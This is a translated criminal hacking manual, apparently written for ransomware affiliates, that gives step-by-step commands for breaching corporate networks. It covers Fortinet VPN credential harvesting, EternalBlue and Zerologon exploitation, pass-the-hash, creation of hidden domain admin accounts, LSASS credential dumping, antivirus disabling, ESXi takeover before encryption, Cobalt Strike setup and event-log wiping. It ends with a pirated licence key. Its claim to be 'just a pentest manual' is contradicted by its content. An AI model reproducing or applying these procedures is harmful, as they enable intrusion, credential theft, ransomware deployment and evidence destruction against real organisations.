Bassterlord (FishEye) Networking

Manual
 Foreward

This manual is designed for beginners in the topic.

But above all, for people who will work for me.

All information will be presented in the form of a manual.

There will be no meaningless explanations of how a certain exploit works and

mountains of incomprehensible code, we will immediately apply it in practice.
How to Deploy the Environment
 We need

1. Virtual Player is required (link)

2. VPN (link) — it is best to use this on the main machine (not on the virtual
machine )

3. Kali Linux torrent (link)

4. Any Windows 10

5. Nmap (link)

6. Mimikaz (link)

7. GMER (link)

8. Scanner (link) — Only use the paid on a virtual machine, do not put on
pwned/broken (?пробитые) computers (there will be a free crack next to the
archive)

9. Pysecdump (link)

10. Psexec (link)

11. Fortinet VPN (link)

12. Procdump (link)

13. PowerTool (will be in an archive next to the document)

14. Metasploit (link)

15. Bluekeep exploit for 3389 under Windows (located next to it in the archive)

16. IMPACKET «https://github.com/SecureAuthCorp/impacket»

17. Zerologon exploit (in the archive cve-2020-1472-exploit.py)

18. Fortinet exploit «https://github.com/7Elements/Fortigate»

19. Veracript (link)

20. Rent a server for $150 a month jabber bearhost@thesecure.biz

21. TOX for communication and correspondence (link)

 The final layout will look like this

Main machine

Virtualbox

Metasploit
Mimikatz
Psexec
Procdump
Pysecdump
Standard log and pass Fortinet VPN
kali - kali Scanner
Fortinet VPN deb Powertool
IMPACKET Gmer
IMPACKET
Zerologon
exploit
NMAP
TOX
Bluekeep
exploit
 Installing software in Kali

Start the VM, enter login kali, password kali

Copy the Fortinet VPN 123.deb in Kali to the home folder

Open the console and type

sudo dpkg -i 123.deb

Enter the kali password and click enter (passwords in kali are not displayed in
the console, you must enter it blindly)

Next, input

sudo git clone https://github.com/SecureAuthCorp/impacket

cd impacket

sudo python setup.py install

If it requires a password, enter kali

 Installing software on a Windows virtual machine

install everything according to the list from the screen with all the default

settings.

Install Python https://www.python.org/downloads/

Copy the impacket folder to the C:\ drive

Open the command line in Windows as an administrator

Enter commands:

cd c:\impacket

python setup.py install

Copy the zerologon exploit in python to the impacket folder:

cve-2020-1472-exploit.py

Install everything else as default and copy the software to the desktop.
Collecting material and how to get it
 For extracting material for work, go to the service

http://masscan.online/ru

Buy an account of your choice and scan the whole world for popular
HTTPS ports, example below:

After the scan is complete, download the results

Go to Kali

Open the console and type

git clone https://github.com/7Elements/Fortigate

cd Fortigate

pip3 install -r requirements.txt

fortigate.py [-h] [-i INPUT] [-o OUTPUT] [-t THREADS] [-c

CREDSCAN]

fortigate.py -i текстовик с нашими айпи (text editor (?) with our

IP) -O valid.txt -t 10 -c y

Run and wait for output (?валид)

 As a result we get something like

This will be our material for work, copy our output to the VM with Windows
and look at the next section.
 RANSOMWARE = Terrorism
You will perform all your actions at your own
peril and risk.
However, the risk is for millions!
I'm not promoting ransoms, it's just a pentest
manual.
Beginning of work/job
First, go to the VM under Windows and Open Fortinet VPN

client

Configure VPN

Click Configure VPN

Next, enter the username and password vpna

If the connection is successful, you will see

Next, I recommend copying the cmd file route_print.cmd to the
desktop from the archive and running it.

Something like the following picture will appear. Pay attention to the
interface and netmask:

In this case, we see the range:

10.102.96.0 — 255.255.255.0

This means that you will register it in the scanner this way:
10.102.96.0 — 10.102.96.255

If you saw a picture like this:

10.102.0.0 — 255.255.0.0

Then in the scanner write:

10.102.0.0 — 10.102.255.255
If we see

0.0.0.0 — 0.0.0.0

0.0.0.0 — 0.0.0.0 from above 2 times

So we scan the ranges of the network as in the example above if they
are there, if they are not there and there are double lines with zeros
then we take and scan the entire range.

192.168.0.0 — 192.168.255.255
Open the Softperfect scanner and enter the resulting ranges.

Enter CTRL+O, the scanner settings will open, set everything as I

have done in the screenshots:
Click ОК
Go to account settings.

Here we will enter the logins and passwords from our VPN

If you are using the paid version of the scanner then you will have a

field integration with nmap

Select(check) SMBEternalBlue and start scanning

After the scan completes, we will see something like this:

Our task is to sort the results by workgroup and TCP ports. And check
for the presence of red C $ disks in pluses under the IP address column
Also do not forget that if you have a paid version of the scanner,
you'll need some alternative settings
 Ports and their correspondences with services

General:135,137,139,445,8080,80,443

Nas synology port: 5000,5001 - Data store

Veeam: 9443,9392,9393,9401,6160 - Backups

DB mysql,mssql,db2,postgresql:3306,1433,50000,5432,5433 -Database

Veritas backup exec. 6101,10000,3527,6106,1125,1434,6102 server

3527,6106 - Backups

Oracle: 1521,1522

Remote control: 22,21,3389 4899,5900 - Possibility of alternative

connection to a computer
Nfs: 111,1039,1047,1048,2049

Iscsi: 860,3260

replication: 902,31031,8123,8043,5480,5722

Sophos Web: 4444

Sophos Console: 2195,8190,8191,8192,8193,8194,49152-65535

In the far right column after the scan, we will see vulnerable devices
for the Eternal Blue vulnerability (MS-17-010) .
Next, we will look at the exploitation of this vulnerability in detail.
 MS-17-010 (Eternal Blue)
To exploit the vulnerability, you will need Metasploit

installed on a virtual machine.

Open the CMD console in Windows

Register msfconsole, press enter and wait for metasploit to load

After loading metasploit, enter the commands one by one:

setg LHOST (IP of our VPNA)

setg RHOSTS (IP of our vulnerable devices, separated by a
space)

use exploi t/wi ndows/smb/ms17_010_psexec

set payload payload/wi ndows/meterpreter/bi nd_tcp

exploit

The end result looks like this:

Press enter and hope for success

If successful, you will see this:

In case of errors, ACCESS DENIED

You can try to encrypt the antivirus payload using the
commands below:
 set EnableStageEncodi ng true

set StageEncoder x86/shi kata_ga_nai

set encoder x86/shi kata_ga_nai

set Exi tOnSessi on false

set Sessi onCommuni cati onTi meout 0

exploit

Next, we wait for the completion of the process and watch active
sessions meterpreter-a
The sessions command displays a list of computers by numbering that
the exploit managed to break through

In our case, we have 2 open sessions.

Let's move on to the first command, sessions 1

Next, we enter the commands:

getsystem

load kiwi

sysinfo – here we are interested in whether the computer is in the

domain

In this case, we see that yes, it is in the domain.

 Next, enter the hashdump command
We get a list of user hashes, and copy them into a separate
text editor.

Next, enter creds_all — this command will try to get unencrypted

passwords from the system
 We also copy them into a separate text document.
If we have several sessions in the meter, then enter the bg command
and repeat the above points starting with sessions, only now we enter
sessions 2, etc. Let's not go through all the sessions yet.

Next, without closing the console, go to the service

https://www.crackmd5.ru/ and try to decrypt the hashes received.

We have already obtained the open passwords of the accounts from
the creds_all command.

Put them into the scanner

Settings => Account Management

Enter accounts in the format Domain \ login password.

After that, close the account control panel, select all IP addresses and
rescan the network.
 Then we expand/open all of the "pluses" in the IP address
column and review the rights received.

We are interested in red local disks C$

If there are red disks everywhere in the domain, this means that we
have received the administrator's domain on the network and we
have rights to read and change data everywhere on the remote
machine.
 If only on several machine, it means only the rights of local
administrators and it is worth looking for other accounts.
If we do not have open passwords but only hashes that could not be
decrypted, we will consider the hash login vulnerabilities in the PASS
THE HASH attacks section.

If the open computer with the red C$ drive does not have port 3389,
you can use the psexec tool, which we will go over in a separate
section.
Using the following parameters and comparing the IP sessions, it can
be determined whether we accessed the server through the
vulnerability.

Or by the hostname in which the DC is present.

For example WHDC.domain.local (the values can be anything, it's

important for us to find out DC exactly)

Then in the service session, you can execute the commands

shell
net group

net group "Domain Admins" /domain

This will help us find out the accounts of domain administrators and
accordingly, is not cluttered with ordinary users and their accounts.

The level "GOD" is important to us, right? :)

Zerologon
To exploit the vulnerability, we need to scan the network and determine the DC
- Domain Controller

How to determine it is described on page 28 above

We need to be connected to the network on which we operate, and also have

Python installed on Windows

Also, Impacket upacked on the C:\impacket path with the exploit

cve-2020-1472-exploit.py already in it

Also, put a .cmd file on the desktop with the following content:

We will rewrite it and launch it for the purposes we need on the network.
Делаем сортировку по аккаунтам пользователей и подставляем нужные
нам значения до первой точки как на скриншоте ниже

Save the Zerologon.cmd file and run it again, it all depends on whether the
server is patched against this vulnerability or not.

We repeat this action on all DCs in turn until we get a positive result:
If the 'Performing authentication attempts' line takes more than 4 minutes or
gives a negative result, go to the next DC or use other vulnerabilities if none of
the DCs are vulnerable.

Sometimes DCs do not impersonate themselves and it is necessary to scan all

machines in the domain (workgroup) with this exploit, but this bears fruit.

After a successful operation, go to Kali.

Connect to the company's VPN

 Open the console and enter the following:

cd impacket/examples

sudo python3 secretsdump.py -no-pass -just-dc AGLEADER/ag40server\$@192.168.16.27

Press enter, it will ask to enter the password, enter 'kali' (it won't show up) and

press enter

Wait for the process of extracting accounts and hashes.

Once it's complete, copy everything that the console provided.

 Next, go to the service https://www.crackmd5.ru/

Trying to decrypt the administrator hash (highlighted in yellow)

Administrator:500:aad3b435b51404eeaad3b435b51404ee:48b3420f6a0f7ae1fb29104b213154ee:::

If we decrypt the password, we boldly break into all computers with these
creds, not forgetting to substitute an example for the working group:

AGLEADER\Administrator and our password.

If we do not receive the password we need to use the Pass The Hash attack.
Pass The Hash
So we have hashes, but we could not get the password from the admin account.
Return to Kali.

If you closed the console, open it again

input cd impacket/examples
sudo python3 smbexec.py -hashes
aad3b435b51404eeaad3b435b51404ee:48b3420f6a0f7ae1fb29104b213154ee
Administrator@192.168.16.27

or

sudo python3 psexec.py -hashes

aad3b435b51404eeaad3b435b51404ee:48b3420f6a0f7ae1fb29104b213154ee

We substitute our data obtained from the Zerologon operation

After execution we will get CMD on the remote DC machine – C:\Windows\system32>

Next, enter the following commands:

net user support Pa$$wo0rd /add

net user support /active:yes

net localgroup Administrators support /add

If we break "High Profile" we can immediately create our own domain admin (?

Original: Если ломимся по «Громкому» можем создать сразу своего домен админа )

net group "Domain Admins" support /add

After that, we get our account with domain administrator rights and, accordingly, we can
break into all the machines on the domain using that account:

support Pa$$wo0rd

Next, go to the DC and remove the creds of the domain admin with mimikatz 64.exe or

32.exe. Commands:

privilege::debug - log 1234.txt - sekurlsa::logonPasswords full

AV Bypass
Connect to the computer, and first look at the tray near the clock and the icons
displayed. Look for AV.

If simply Windows Defender is installed on the computer, go to the settings and

add the C:\ drive to the exceptions.
 Usually antivirus without a password can stupidly be uninstalled through the
uninstallation wizard in Windows.

It is important if we see AV Sophos (blue) or Sentinel installed.

on all machines, further work with this company will be meaningless.

Other antivirus solutions can be easily killed through 2 tools:

Gmer

PowerTool

If you can't kill AV, open the Windows registry

follow the path:

A computer\HKEY_LOCAL_MACHINE\SOFTWARE

and look for folders with AV names

Look at all the subfolders that are in the folder with AV, our goal is to find the
folders and values inside them with the name 'Exclusions'.

Suppose we found the value of the exceptions, let's say

С:\users\admin\java.exe

Rename malware to java.exe and throw it on this path, if there is no such path
or folders on this machine, create 1-in-1 folders as indicated in the exceptions
and try to run our file.

In most cases, AV does not see this if it isn't too smart. :)

If nothing comes out of the above, we stomp on all machines in the domain on
port 3389 from the scanner and see if the AV is installed there.
 If AV is not installed on several machines, you can put a portable softperfect
scanner there, scan the network from the inside, mount the disks and run our
h*cker, sorry choked =D

Ideally, you need to kill AV wherever possible and add C:\ drives to the
exceptions

And for computers that don't have port 3389, including NAS storages, mount
and only then start lkh k yes what is that =D
NAS and Backups
 The hardest part :)

So we got access to the domain admin

We scan the network from the inside

We look at all ports

Usually our storages hang on ports

5000,5001

and backups

Veeam: 9443,9392,9393,9401,6160

Veritas backup exec. 6101,10000,3527,6106,1125,1434,6102 server 3527,6106

or they will be signed in the hostname as NAS

Usually, we hang out outside the domain, first of all we look at the scan if we
now have access to them from a regular scan with the domain admin accounts
 However, if we are in the workgroup, you can break through all the domain
administrators and try to log into them using creds without a domain from the
pwned accounts. This is done through the web interface by opening the NAS IP
through the browser and specifying the NAS port separated by a colon.

In 40 % of cases, domain admin creds should be suitable.

Log in as Admin with the same password, or try password from other domain
admins, the probability of breaking through increases.

Sometimes when scanning NAS through Softperfect, accounts are displayed that
are active in the repository, usually this:

Admin, backup, Sysadm, etc.

If we opened the network through PASS THE HASH, look for these accounts in
the results of the received hashes and get passwords from them through the
hash cracking service.

With veeam and other backups, the same thing.

And the most important thing at the Hacker stage, we need to start with disks
and computers where the most memory is from 500 gigs and more.

Accordingly, the most important and the first will be

"Big data"
VС и ESXI
This section will hold great and terrible for
me (?):

Boris Nikolaevich Yeltsin

(Борис Николаевич Ельцин)
Aka. https://xss.is/members/204378/
 The trick is that you don't need to bypass the AV
First you need to get creds from the vCenter

60% of the time it is in the domain and on AD creds

Otherwise, the keylogger

In my work, I often face the task of resetting the root password on esx.

Let's imagine a situation where we have vCenter administrator credentials, there

is a domain admin and the whole network is ready to fuck, but we couldn't catch
the password under esx. Here's one of the ways.

No reboot, without being too obvious (?)

BUT I STRONGLY RECOMMEND RESETTING THE PASS IN THE NIGHT

BEFORE THE OPEN NETWORK (?)

That is, you reset the password and encrypt it right away.

This method is consists of entering esx into the domain and then we will be able
to log in using the credentials of the domain administrator.

Then create a global ESX Admins group there, be sure to include our domain
admin there.

Then we return to vcenter

Select the esx host, press configure - Authentication Service - Join domain

Enter the domain in the format domain.local or domain.com, which domain can
be found by entering systeminfo on the computer in the domain.

Enter the login of the domain administrator without a domain and password.
Now everything is ready for authorization, go to the esx host using the domain
admin credentials and reset the root pass.
Then you just go to esx via ssh

Turn off the machine.

And you do dirty deeds =)

PSEXEC
 In this section, we will look at the Psexec tool and how it will be useful in
practice.

First of all, it will help us run any file on all machines to which we have
access.

Suppose we have an exe file that we need to run

Open CMD and drag psexec.exe there

and then write the following

text editor with IP addresses the account of the domain password from domain
of the computers on which the file to run
admin together with the admin
we run the file domain

If you removed all AVs, added exceptions and did everything right, this exe
will run on all computers.

If you need to run the file on behalf of the system, add the file.exe to the
parameters -s -d -c

Through Psexec, you can get and remove creds from remote computers if they
do not have port 3389 but we have an account.

Open the C$ folder through the scanner and drop pysecdump.exe

and procdump.exe

the account of the domain

the IP of the machine we domain admin
admin together with the
are going to take from the password remotely open a
domain
scanner and a red disk C$ cmd on behalf of
the system on a
remote machine
 So we got in the machine doing

cd C:\

pysecdump.exe -s

This command will give us the admin hashes on the remote computer, we are
trying to break through the site or use PASS THE HASH in Kali or other
machines.

Next, we do

reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\

WDigest /v UseLogonCredential /t REG_DWORD /d 1

procdump.exe --accepteula -ma lsass.exe lsass.dmp

If successful, an lsass.dmp file will be created on the remote machine on the C:\
drive.

Copy it to your computer next to mimikatz.exe

We open mimikatz and do it in:

sekurlsa::minidump lsass.dmp

privilege::debug

log 1234.txt

sekurlsa::logonPasswords full

It will also give us creds or hashes.

Next, you can try to remotely enable the rdp port with the command

reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\

Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f

Doesn't always work!

After executing the command, it will be possible to be cut to the RDP

Do not forget to delete all files and traces of work on the remote machine.
 After all the actions, if you want to wipe the traces of your stay to a
minimum and postpone the break-in

On the machines that you entered using RDP, you can open powershell and

type the following:

wevtutil el | Foreach-Object {wevtutil cl "$_"}

This will erase all logs ("evidence"? literally translated as magazines)

Also, commands for removing hidden accounts cmd

net user support Pa$$wo0rd /delete

net group "Domain Admins" support /delete

Cobalt Strike
How I see all PPs
Advert

Do you know Cobalt?

Speak!

Simply put, the above methods described by me

completely exclude Cobalt, well, if people ask why
not?
 In short, we rent a server for Linux
Throw Cobalt there
Type this in the console
cd cs4.0
java -XX:ParallelGCThreads=4 -
Dcobaltstrike.server_port=50050 -
Djavax.net.ssl.keyStore=./cobaltstrike.store -
Djavax.net.ssl.keyStorePassword=123456 -server -XX:
+AggressiveHeap -XX:+UseParallelGC -
javaagent:Hook.jar -classpath ./cobaltstrike.jar
server.TeamServer IP SERVER 12345
Switch to my machine, I work from Windows in Cobalt
For this, you must first install Java
Run cobaltstrike.bat

Enter the IP of our rented host account and the

password that is specified in the config above.
 Go to this section.

Create a listener.

Next, create a payload.

After clicking the Generate button, we will have
an executable, push it to the DC and run it there.
Next, we do:

In the same place, select

 Then go to

We select all the machines on the network and try to

break into them using the admin hash.
It is worth mentioning that machines do not always
go to the general Internet.
 Then do

We turn the infected computer into a local listener on

which all machines in the area will knock =D
There is no point in describing the rest of the
functionality, since for me Cobalt is only suitable for
conveniently removing creds and searching for creds
from NAS.
And so it's just bat guano that burns like a Christmas
tree (?) with all that is possible and a crypt for this
threshing floor costs fucking money and you still need
a programmer who will rewrite the payload haha.
BLUEKEEP
I'm donating a self-written exploit to you for 3389

All you need to do is add an IP from 3389

in a column without ports and run run.bat
If you open run.bat through a text editor, you will see
the creds of the hidden accounts that will be created on
the computers pwned by the exploit.
Гуды будут сохранены в отдельный текстовик.
The exploit first tries to turn the remote machine into a
blue screen and waits for them to reboot.
After rebooting, it automatically executes the payload
and we get a hidden account with admin rights on the
vulnerable computer.
 This exp needs to be restarted 2-3 times, it does not
always work as needed, this is due to the restart timings
on remote machines.
Well, now after we have buried the sellers of RDP
accesses, you can proceed to the conclusion.
 Here is collected knowledge that will help you earn one
way or another, this is all that I knew.
The source of illustrations for this manual is taken
from the Fish Eye Place Manual
https://www.yuumeiart.com/
I do not argue that there are people smarter than me
and with a much wider, vast store of knowledge, but as
for me this is enough for a pentest of any network, be it
Citrix, Cisco, Palo Alto, Pulse, Fortinet.
Bonus license for Softperfect until 2022
dUYiN30Q4+ydHwgPCwku3K
+FYDomodEqW0bRGcTyxvdnlc7g4nne7cfwXOGPJbBVdPeqEs7jzX2yDiVxxiiNaCvNK4T7ML0Qfarren5vr
MZEBcoOivf7QQ05BPxSG370cIus/AZxAuRAcibpckx1Ie+R4UTNiyBh6ZVcIwii+8M1lnRp+lcRmFqbgLGZ/
cbzzh09IfaFKwoGJRPcTcnizxQtBJSk9sqlbNc6SwWeiQgl+0J+A1mrkrG3zd03vSjBUbc8daN08ebjOGYDsZVptkkhe5ASAJt/
Uwzs0QCqO2issqS+QpE/atLV3lR63k/
2G1y6yECKu7w+s1SV9aEKsxKhuBJplKLhbGoQIX7hGxDwww1HFLGqCZbAce1mz7aP6xqqltEgoM2oVvKv02tVUoLGYSHYtAGGoaksl
XXu4+MLs26nLUoltIfIcOC1dOQsjChjXil8Im+dDOY+V1m5M0e2GckmBjTX4blWbz+hOmjl23n6f0jSndxT70Dd3Jl9